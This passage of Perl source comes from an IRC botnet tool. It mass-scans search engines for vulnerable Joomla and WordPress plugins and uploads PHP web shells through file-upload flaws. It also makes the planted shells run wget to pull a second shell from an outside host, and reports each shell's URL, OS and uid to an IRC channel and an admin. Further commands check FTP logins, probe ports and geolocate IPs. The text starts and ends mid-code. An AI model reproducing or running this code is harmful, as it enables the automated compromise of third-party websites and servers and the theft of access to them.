my ($bug,$dork) = ("/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=cf6dd3cf1923c950586d0dd595c8e20b",$1);
my $simpan = 'situs.txt';
&msg("$chanxxx","9,1[4!9]11 Lapor 4<9=4> 9$nick 11Is Scanning JCE On 4$path ");
&msg("$path","$jcelogo9,1Dork 4<9=4>11 $dork ");
&msg("$path","$jcelogo9Search Engine 4,1<9=4>11,1 Now Loading ... ");
&msg("$path","$jcelogo7ATTENTION : 11,1Don't flood the bot.. 11OK!!!");
sendraw("MODE $path +m");
&se_start($path,$bug,$simpan,$dork,$engine,15);
}
}
}
if ($msg =~ /^$jnewscmd\s+(.*)/) {
if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
my ($bug,$dork) = ("/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php",$1);
my $simpan = $nick;
&msg("$path","12[4!12]15 Lapor 12$nick 15Is Scanning JNews on 4$path ");
&msg("$path","$jnewslogo9Dork $dork ");
&msg("$path","$jnewslogo9Search Engine Now Loading ... ");
&msg("$path","$jnewslogo9ATTENTION : 4Don't flood the bot.. 10OK!!!");
sendraw("MODE $path +m");
&se_start($path,$bug,$simpan,$dork,$engine,16);
}
}
}
if ($msg =~ /^$jinccmd\s+(.*)/) {
if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
my ($bug,$dork) = ("/administrator/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php",$1);
my $simpan = $nick;
&msg("$path","12[4!12]15 Lapor 12$nick 15Is Scanning JINC on 4$path ");
&msg("$path","$jinclogo9Dork $dork ");
&msg("$path","$zinclogo9Search Engine Now Loading ... ");
&msg("$path","$jincologo9ATTENTION : 4Don't flood the bot.. 10OK!!!");
sendraw("MODE $path +m");
&se_start($path,$bug,$simpan,$dork,$engine,17);
}
}
}
if ($msg =~ /^$lettercmd\s+(.*)/) {
if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
my ($bug,$dork) = ("/administrator/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php",$1);
my $simpan = $nick;
&msg("$path","12[4!12]15 Lapor 12$nick 15Is Scanning letter on 4$path ");
&msg("$path","$letterlogo9Dork $dork ");
&msg("$path","$letterlogo9Search Engine Now Loading ... ");
&msg("$path","$letterlogo9ATTENTION : 4Don't flood the bot.. 10OK!!!");
sendraw("MODE $path +m");
&se_start($path,$bug,$simpan,$dork,$engine,18);
}
}
}
if ($msg =~ /^$redmistyccmd\s+(.*)/) {
if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
my ($bug,$dork) = ("/administrator/components/com_redmystic/chart/ofc-library/ofc_upload_image.php",$1);
my $simpan = $nick;
&msg("$path","12[4!12]15 Lapor 12$nick 15Is Scanning RedMistyc on 4$path ");
&msg("$path","$redmistyclogo9Dork $dork ");
&msg("$path","$redmistyclogo9Search Engine Now Loading ... ");
&msg("$path","$redmistyclogo9ATTENTION : 4Don't flood the bot.. 10OK!!!");
sendraw("MODE $path +m");
&se_start($path,$bug,$simpan,$dork,$engine,19);
}
}
}
if ($msg =~ /^$clipbucketcmd\s+(.*)/) {
if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
my ($bug,$dork) = ("/admin_area/charts/ofc-library/ofc_upload_image.php",$1);
my $simpan = $nick;
&msg("$path","12[4!12]15 Lapor 12$nick 15Is Scanning ClipBucket on 4$path ");
&msg("$path","$clipbucketlogo9Dork $dork ");
&msg("$path","$clipbucketlogo9Search Engine Now Loading ... ");
&msg("$path","$clipbucketlogo9ATTENTION : 4Don't flood the bot.. 10OK!!!");
sendraw("MODE $path +m");
&se_start($path,$bug,$simpan,$dork,$engine,20);
}
}
}
if ($msg =~ /^$phpvmscmd\s+(.*)/) {
if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
my ($bug,$dork) = ("/core/lib/php-ofc-library/ofc_upload_image.php",$1);
my $simpan = $nick;
&msg("$path","12[4!12]15 Lapor 12$nick 15Is Scanning PhpVms on 4$path ");
&msg("$path","$phpvmslogo9Dork $dork ");
&msg("$path","$phpvmslogo9Search Engine Now Loading ... ");
&msg("$path","$phpvmslogo9ATTENTION : 4Don't flood the bot.. 10OK!!!");
sendraw("MODE $path +m");
&se_start($path,$bug,$simpan,$dork,$engine,21);
}
}
}
if ($msg =~ /^$maian15cmd\s+(.*)/) {
if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
my ($bug,$dork) = ("/administrator/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php",$1);
my $simpan = $nick;
&msg("$path","12[4!12]15 Lapor 12$nick 15Is Scanning Maian15 on 4$path ");
&msg("$path","$maian15logo9Dork $dork ");
&msg("$path","$maian15logo9Search Engine Now Loading ... ");
&msg("$path","$maian15logo9ATTENTION : 4Don't flood the bot.. 10OK!!!");
sendraw("MODE $path +m");
&se_start($path,$bug,$simpan,$dork,$engine,22);
}
}
}
if ($msg=~ /^$findcmd\s+(.*)/) {
if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
my ($bug,$dork) = ("images/stories/3xp.php",$1);
my $simpan = 'situs.txt';
&msg("$chanxxx","9,1[4!9]15Report 4<9=4> 9$nick 15is scanning JCE-Finder on 4$path ");
&msg("$path","$jcelogo 9Dork :4 $dork");
&msg("$path","$jcelogo 13Search Engine Loading ...");
&msg("$path","$jcelogo7Hacker BoUnCeR 8,1A.K.A ^SQl^KInG^-11Private Underground!!!");
&msg("$path","$jcelogo 13Flood Protection Activated ...");
sendraw("MODE $path +m");
&se_start($path,$bug,$simpan,$dork,$engine,23);
}
}
}
if ($msg =~ /^$ftpcmd\s+(.+?)\s+(.*)\s+(.*)/) {
my $url = $_[0];
my $host = $_[1];
my $user = $_[2];
my $pass = $_[3];
if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
my ($host,$user,$pass) = ($1,$2,$3);
&msg("$path","9,1[4!9]FTP 4<9=4>15 Checking $host | $user:$pass");
my $success = 1;
use Net::FTP;
my $ftp = Net::FTP->new($host, Debug => 0, Timeout => 5);
$success = 0 if $ftp->login($user,$pass);
$ftp->quit;
if ($success == 0) {
¬ice("$nick","15,1 [9FTP15] [ 9http://".$host." 15] [".$user.":".$pass."15] 9Success ");
} else {
¬ice("$nick","15,1 [9FTP15] [ 9http://".$host." 15] [".$user.":".$pass."15] 4Denied ");
}
}
}
}
if ($msg=~ /^!ip\s+(.*)/ ) {
if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
my $ip = $1;
&msg("$path","9,1[4!9]15IP 4<9=4>15Searching ".$ip." 4Location ...");
my $website = "http://www.ipligence.com/geolocation";
my ($useragent,$request,$response,%form);
undef %form;
$form{ip} = $ip;
$useragent = LWP::UserAgent->new;
$useragent->timeout(5);
$request = POST $website,\%form;
$response = $useragent->request($request);
if ($response->is_success) {
my $res = $response->content;
if ($res =~ m/Your IP address is(.*)<br>City:(.*)<br\/>Country:(.*)<br>Continent:(.*)<br>Time/g) {
my ($ipaddress,$city,$country,$continent) = ($1,$2,$3,$4);
&msg("$path","9,1[4!9]15IP 4<9=4>15IP Address : ".$ip." 4[".$ipaddress."]");
&msg("$path","9,1[4!9]15IP 4<9=4>15City : ".$ip." 4[".$city."]");
&msg("$path","9,1[4!9]15IP 4<9=4>15Country : ".$ip." 4[".$country."]");
&msg("$path","9,1[4!9]15IP 4<9=4>15Continent : ".$ip." 4[".$continent."]");
}
else {
&msg("$path","9,1[4!9]15IP 4<9=4>15 ".$ip." 4not found in database");
}
}
else {
&msg("$path","9,1[4!9]15IP 4<12=4> 4 Cannot open IP database.");
}
}
exit;
}
}
if ($msg=~ /^!dns\s+(.*)/){
my $nsku = $1;
my $mydns = inet_ntoa(inet_aton($nsku));
&msg("$path", "9,1[4!9]15DNS 4<9=4>15$nsku 4Resolved to 4 $mydns");
}
if ($msg=~ /^!port\s+(.*?)\s+(.*)/ ) {
my $hostip= "$1";
my $portsc= "$2";
my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $portsc, Proto =>'tcp', Timeout => 7);
if ($scansock) {
&msg("$path","9,1[4!9]15PORT 4<9=4>15 $hostip : $portsc 12Successful !");
}
else {
&msg("$path","9,1[4!9]15PORT 4<9=4>15 $hostip : $portsc 4Failed !");
}
}
}
}
for(my $c=0; $c<= $#lines; $c++) {
$line = $lines[$c];
$line = $line_temp.$line if ($line_temp);
$line_temp = '';
$line =~ s/\r$//;
unless ($c == $#lines) {
parse("$line");
} else {
if ($#lines == 0) {
parse("$line");
} elsif ($lines[$c] =~ /\r$/) {
parse("$line");
} elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) {
parse("$line");
} else {
$line_temp = $line;
}
}
}
}
#deleted
##################################################################################
sub lobex() {
my $dork = $_[0];
my @targets;
for (my $st=0; $st<=1000 ; $st+=100){
my $engine = "http://www.google.com/search?q=".uri_escape($dork)."&num=100&start=".$st;
my $browser = &search_engine_query($engine);
while ($browser =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
my $target = $1;
if ($target !~ /google|forum|stackoverflow|php\.net/) {
my @sort = split(/\.php/,$target);
push (@targets,$sort[0]);
}
}
}
return @targets;
}
sub cari() {
my $chan = $_[0];
my $dork = $_[1];
my $count = 0;
my @kotor = &lobex($dork);
my @target = &clean(@kotor);
my $num = scalar(@target); &msg($chan,"$carilogo9 Total 4[15$num4]9 sites");
if ($num > 0) {
foreach my $site(@target) {
$count++;
if ($count == $num-1) {
&msg("$chan","$carilogo9Finished 15for 9$dork ");
}
my $test = "http://".$site.".php?src=".$thumbshell;
if (my $pid = fork) { waitpid($pid, 0); } else {
if (fork) { exit; } else {
my $coba = &get_content($test);
if ($coba =~ /Unable to open image/) {
&msg($chan,"$carilogo9 VulN 4-> 15 http://".$site.".php ");
}
} exit;
}
}
}
}
sub type() {
my ($chan,$bug,$simpan,$dork,$engine,$type) = @_;
if ($type == 1){$type=&thumb_exploit($chan,$bug,$simpan,$dork,$engine);}
elsif ($type == 2){$type=&whmcs_exploit($chan,$bug,$simpan,$dork,$engine);}
elsif ($type == 3){$type=&lfi_exploit($chan,$bug,$simpan,$dork,$engine);}
elsif ($type == 4){$type=&zero_exploit($chan,$bug,$simpan,$dork,$engine);}
elsif ($type == 5){$type=&rfi_exploit($chan,$bug,$simpan,$dork,$engine);}
elsif ($type == 6){$type=&xml_exploit($chan,$bug,$simpan,$dork,$engine);}
elsif ($type == 7){$type=&e107_exploit($chan,$bug,$simpan,$dork,$engine);}
elsif ($type == 8){$type=&ih_exploit($chan,$bug,$simpan,$dork,$engine);}
elsif ($type == 9){$type=&osco_exploit($chan,$bug,$simpan,$dork,$engine);}
elsif ($type == 10){$type=&zen_exploit($chan,$bug,$simpan,$dork,$engine);}
elsif ($type == 11){$type=&rfg_exploit($chan,$bug,$simpan,$dork,$engine);}
elsif ($type == 12){$type=&mmfc_exploit($chan,$bug,$simpan,$dork,$engine);}
elsif ($type == 13){$type=&avm_exploit($chan,$bug,$simpan,$dork,$engine);}
elsif ($type == 14){$type=&sql_exploit($chan,$bug,$simpan,$dork,$engine);}
elsif ($type == 15){$type=&jce_exploit($chan,$bug,$simpan,$dork,$engine);}
elsif ($type == 16){$type=&jnews_exploit($chan,$bug,$simpan,$dork,$engine);}
elsif ($type == 17){$type=&jinc_exploit($chan,$bug,$simpan,$dork,$engine);}
elsif ($type == 18){$type=&letter_exploit($chan,$bug,$simpan,$dork,$engine);}
elsif ($type == 19){$type=&redmistyc_exploit($chan,$bug,$simpan,$dork,$engine);}
elsif ($type == 20){$type=&clipbucket_exploit($chan,$bug,$simpan,$dork,$engine);}
elsif ($type == 21){$type=&phpvms_exploit($chan,$bug,$simpan,$dork,$engine);}
elsif ($type == 22){$type=&maian15_exploit($chan,$bug,$simpan,$dork,$engine);}
elsif ($type == 23){$type=&find_exploit($chan,$bug,$simpan,$dork,$engine);}
}
##################################################################################
sub se_start() {
my ($chan,$bug,$simpan,$dork,$engine,$type) = @_;
if ($gps ==1) {
if ($engine =~ /jackae/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKAE",$type); } exit; } }
if ($engine =~ /jackar/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKAR",$type); } exit; } }
if ($engine =~ /jackat/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKAT",$type); } exit; } }
if ($engine =~ /jackau/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKAU",$type); } exit; } }
if ($engine =~ /jackbr/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKBR",$type); } exit; } }
if ($engine =~ /jackca/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKCA",$type); } exit; } }
if ($engine =~ /jackcl/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKCL",$type); } exit; } }
if ($engine =~ /jackcn/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKCN",$type); } exit; } }
if ($engine =~ /jackcom/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKCoM",$type); } exit; } }
if ($engine =~ /jackcz/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKCZ",$type); } exit; } }
if ($engine =~ /jackde/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKDE",$type); } exit; } }
if ($engine =~ /jackdk/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKDK",$type); } exit; } }
if ($engine =~ /jackes/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKES",$type); } exit; } }
if ($engine =~ /jackeu/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKEU",$type); } exit; } }
if ($engine =~ /jackfr/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKFR",$type); } exit; } }
if ($engine =~ /jackhu/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKHU",$type); } exit; } }
if ($engine =~ /jackid/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKID",$type); } exit; } }
if ($engine =~ /jackil/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKIL",$type); } exit; } }
if ($engine =~ /jackin/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKIN",$type); } exit; } }
if ($engine =~ /jackinfo/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKInfO",$type); } exit; } }
if ($engine =~ /jackir/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKIR",$type); } exit; } }
if ($engine =~ /jackit/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKIT",$type); } exit; } }
if ($engine =~ /jackjp/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKJP",$type); } exit; } }
if ($engine =~ /jackkr/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKKR",$type); } exit; } }
if ($engine =~ /jackmx/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKMX",$type); } exit; } }
if ($engine =~ /jackmy/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKMY",$type); } exit; } }
if ($engine =~ /jacknet/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKNeT",$type); } exit; } }
if ($engine =~ /jacknl/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKNL",$type); } exit; } }
if ($engine =~ /jackorg/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKOrG",$type); } exit; } }
if ($engine =~ /jackph/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKPH",$type); } exit; } }
if ($engine =~ /jackpl/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKPL",$type); } exit; } }
if ($engine =~ /jackro/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKRO",$type); } exit; } }
if ($engine =~ /jackru/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKRU",$type); } exit; } }
if ($engine =~ /jackth/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKTH",$type); } exit; } }
if ($engine =~ /jackua/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKUA",$type); } exit; } }
if ($engine =~ /jackuk/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKUK",$type); } exit; } }
if ($engine =~ /jackus/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKUS",$type); } exit; } }
if ($engine =~ /jacksi/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKSI",$type); } exit; } }
if ($engine =~ /jackbe/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKBE",$type); } exit; } }
if ($engine =~ /jackbiz/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKBIZ",$type); } exit; } }
}
if ($engine =~ /google/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"GooGLe",$type); } exit; } }
if ($gps2 ==1) {
if ($engine =~ /bing/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"Bing",$type); } exit; } }
if ($engine =~ /biglobe/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"BigLobe",$type); } exit; } }
if ($engine =~ /walla/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"WaLLa",$type); } exit; } }
if ($engine =~ /yahoo/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"YaHoo",$type); } exit; } }
if ($engine =~ /ask/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"AsK",$type); } exit; } }
if ($engine =~ /uol/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"UoL",$type); } exit; } }
if ($engine =~ /onet/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"OnEt",$type); } exit; } }
if ($engine =~ /clusty/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"CLusTy",$type); } exit; } }
if ($engine =~ /sapo/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"SaPo",$type); } exit; } }
if ($engine =~ /aol/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"AoL",$type); } exit; } }
if ($engine =~ /lycos/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"LyCos",$type); } exit; } }
if ($engine =~ /hotbot/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"HotBot",$type); } exit; } }
if ($engine =~ /seznam/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"SeZNam",$type); } exit; } }
}
}
###### EXPLOITING #######
sub rfg_exploit() {
my $chan = $_[0];
my $bugz = $_[1];
my $simpan = $_[2];
my $dork = $_[3];
my $engine = $_[4];
my $count = 0;
my @totexploit = &search_engine($chan,$bugz,$dork,$engine,$rfglogo);
my $num = scalar(@totexploit);
if ($num > 0){
foreach my $site(@totexploit){
$count++;
if ($count == $num-1) { &msg("$chan","$rfglogo15$engine 9Finished 15for 9$dork "); }
my $aplod = LWP::UserAgent->new;
my $res = $aplod->post("http://".$site.$bugz,['file[]' => ['./xxx.php' => 'xxx.php' => 'application/octet-stream']],'Content-Type' => 'form-data');
my $hasil = $res->content;
my $vpath = "wp-content/plugins/radykal-fancy-gallery/admin/";
# my $test = "http://garguritos.com/rfg.php?url=http://".$site;
if ($hasil=~ /\"realFile\":\"(.*)php\"/){
&msg("$chan","$rfglogo15$engine 9e3x9p3l9o3i9t3i9n3g 15http://$site ");
my $prikitiw = $1;
my $test = "http://".$site.$vpath.$prikitiw."php";
if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
my $cekap = &get_content($test);
if ($cekap =~ /UnKnown - Simple Shell/) {
my $safe = ""; my $os = ""; my $uid = "";
if ($cekap =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;}
if ($cekap =~ /Uname : (.*?)<\/b>/){$os=$1;}
if ($cekap =~ /uid=(.*?)gid=/){$uid=$1;}
&msg("$chan","$rfglogo15$engine 4<9=4>9 Simple sHeLL 4<9=4>9 $test15 (SafeMode=$safe) (OS=$os) uid=$uid ");
&msg("$admin","$rfglogo15$engine 4<9=4>9 Simple sHeLL 4<9=4>9 $test15 (SafeMode=$safe) (OS=$os) uid=$uid ");
my $cupl = $test."?cmd=wget";
my $crut = &get_content($cupl);
if ($crut =~ /missing/i) {
my $upload = $cupl.'%20'.$thumbshell.'%20-O%20bad.php';&get_content($upload);sleep(1);
my $shell = "http://".$site.$vpath."bad.php";
my $check = &get_content($shell);
if ($check =~ /stunshell/i){
my $safe = ""; my $os = ""; my $uid = "";
if ($check =~ m/SAFE_MODE: <b><font color=blue>(.*?)<\/font>/) {$safe = $1;}
if ($check =~ m/color=red><b> (.*?)<br>/) {$os = $1;}
if ($check =~ m/uid=(.*?)gid=/) {$uid = $1;}
&msg("$admin","$rfglogo15$engine 4<9=4>9 sHeLL 4<9=4>9 ".$shell."15 (SafeMode=$safe) (OS=$os) uid=$uid ");
&msg("$chan","$rfglogo15$engine 4<9=4>9 sHeLL 4<9=4>9 ".$shell."15 (SafeMode=$safe) (OS=$os) uid=$uid ");
}
}
}
} exit; } }
}
}
}
sub mmfc_exploit() {
my $chan = $_[0];
my $bugz = $_[1];
my $simpan = $_[2];
my $dork = $_[3];
my $engine = $_[4];
my $count = 0;
my @totexploit = &search_engine($chan,$bugz,$dork,$engine,$mmfclogo);
my $num = scalar(@totexploit);
if ($num > 0){
foreach my $site(@totexploit){
$count++;
if ($count == $num-1) { &msg("$chan","$mmfclogo15$engine 9Finished 15for 9$dork "); }
my $aplod = LWP::UserAgent->new;
my $res = $aplod->post("http://".$site.$bugz,['fileToUpload' => ['./xxx.php' => 'xxx.php' => 'application/octet-stream']],'Content-Type' => 'form-data');
my $hasil = $res->content;
my $vpath = "wp-content/plugins/mm-forms-community/upload/temp/";
if ($hasil=~ /has been successfully uploaded/){
my $filexxx = "";
if ($hasil=~ /filename: \'(.*)php/){$filexxx = $1;}
&msg("$chan","$mmfclogo15$engine 9e3x9p3l9o3i9t3i9n3g 15http://$site ");
my $test = "http://".$site.$vpath.$filexxx."php";
if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
my $cekap = &get_content($test);
if ($cekap =~ /UnKnown - Simple Shell/) {
my $safe = ""; my $os = ""; my $uid = "";
if ($cekap =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;}
if ($cekap =~ /Uname : (.*?)<\/b>/){$os=$1;}
if ($cekap =~ /uid=(.*?)gid=/){$uid=$1;}
&msg("$chan","$mmfclogo15$engine 4<9=4>9 Simple sHeLL 4<9=4>9 $test15 (SafeMode=$safe) (OS=$os) uid=$uid ");
&msg("$admin","$mmfclogo15$engine 4<9=4>9 Simple sHeLL 4<9=4>9 $test15 (SafeMode=$safe) (OS=$os) uid=$uid ");
my $cupl = $test."?cmd=wget";
my $crut = &get_content($cupl);
if ($crut =~ /missing/i) {
my $upload = $cupl.'%20'.$thumbshell.'%20-O%20bad.php';&get_content($upload);sleep(1);
my $shell = "http://".$site.$vpath."bad.php";
my $check = &get_content($shell);
if ($check =~ /stunshell/i){
my $safe = ""; my $os = ""; my $uid = "";
if ($check =~ m/SAFE_MODE: <b><font color=blue>(.*?)<\/font>/) {$safe = $1;}
if ($check =~ m/color=red><b> (.*?)<br>/) {$os = $1;}
if ($check =~ m/uid=(.*?)gid=/) {$uid = $1;}
&msg("$admin","$mmfclogo15$engine 4<9=4>9 sHeLL 4<9=4>9 ".$shell."15 (SafeMode=$safe) (OS=$os) uid=$uid ");
&msg("$chan","$mmfclogo15$engine 4<9=4>9 sHeLL 4<9=4>9 ".$shell."15 (SafeMode=$safe) (OS=$os) uid=$uid ");
}
}
}
} exit; } }
}
}
}
sub avm_exploit() {
my $chan = $_[0];
my $bugz = $_[1];
my $simpan = $_[2];
my $dork = $_[3];
my $engine = $_[4];
my $count = 0;
my @totexploit = &search_engine($chan,$bugz,$dork,$engine,$avmlogo);
my $num = scalar(@totexploit);
if ($num > 0){
foreach my $site(@totexploit){
$count++;
if ($count == $num-1) { &msg("$chan","$avmlogo15$engine 9Finished 15for 9$dork "); }
my $aplod = LWP::UserAgent->new;
my $res = $aplod->post("http://".$site.$bugz,['Filedata' => ['./xxx.php' => 'xxx.php' => 'application/octet-stream']],'Content-Type' => 'form-data');
my $hasil = $res->content;
my $vpath = "wp-content/videoaudio/temp/";
if ($hasil=~ /\"filename\":\"xxx.php\"/){
&msg("$chan","$avmlogo15$engine 9e3x9p3l9o3i9t3i9n3g 15http://$site ");
my $test = "http://".$site.$vpath."xxx.php";
if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
my $cekap = &get_content($test);
if ($cekap =~ /UnKnown - Simple Shell/) {
my $safe = ""; my $os = ""; my $uid = "";
if ($cekap =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;}
if ($cekap =~ /Uname : (.*?)<\/b>/){$os=$1;}
if ($cekap =~ /uid=(.*?)gid=/){$uid=$1;}
&msg("$chan","$avmlogo15$engine 4<9=4>9 Simple sHeLL 4<9=4>9 $test15 (SafeMode=$safe) (OS=$os) uid=$uid ");
&msg("$admin","$avmlogo15$engine 4<9=4>9 Simple sHeLL 4<9=4>9 $test15 (SafeMode=$safe) (OS=$os) uid=$uid ");
my $cupl = $test."?cmd=wget";
my $crut = &get_content($cupl);
if ($crut =~ /missing/i) {
my $upload = $cupl.'%20'.$thumbshell.'%20-O%20bad.php';&get_content($upload);sleep(1);
my $shell = "http://".$site.$vpath."bad.php";
my $check = &get_content($shell);
if ($check =~ /stunshell/i){
my $safe = ""; my $os = ""; my $uid = "";
if ($check =~ m/SAFE_MODE: <b><font color=blue>(.*?)<\/font>/) {$safe = $1;}
if ($check =~ m/color=red><b> (.*?)<br>/) {$os = $1;}
if ($check =~ m/uid=(.*?)gid=/) {$uid = $1;}
&msg("$admin","$avmlogo15$engine 4<9=4>9 sHeLL 4<9=4>9 ".$shell."15 (SafeMode=$safe) (OS=$os) uid=$uid ");
&msg("$chan","$avmlogo15$engine 4<9=4>9 sHeLL 4<9=4>9 ".$shell."15 (SafeMode=$safe) (OS=$os) uid=$uid ");
}
}
}
} exit; } }
}
}
}
sub zen_exploit() {
my $chan = $_[0];
my $bug = $_[1];
my $simpan = $_[2];
my $dork = $_[3];
my $engine = $_[4];
my $count = 0;
my @totexploit = &search_engine($chan,$bug,$dork,$engine,$zenlogo);
my $num = scalar(@totexploit);
if ($num > 0){
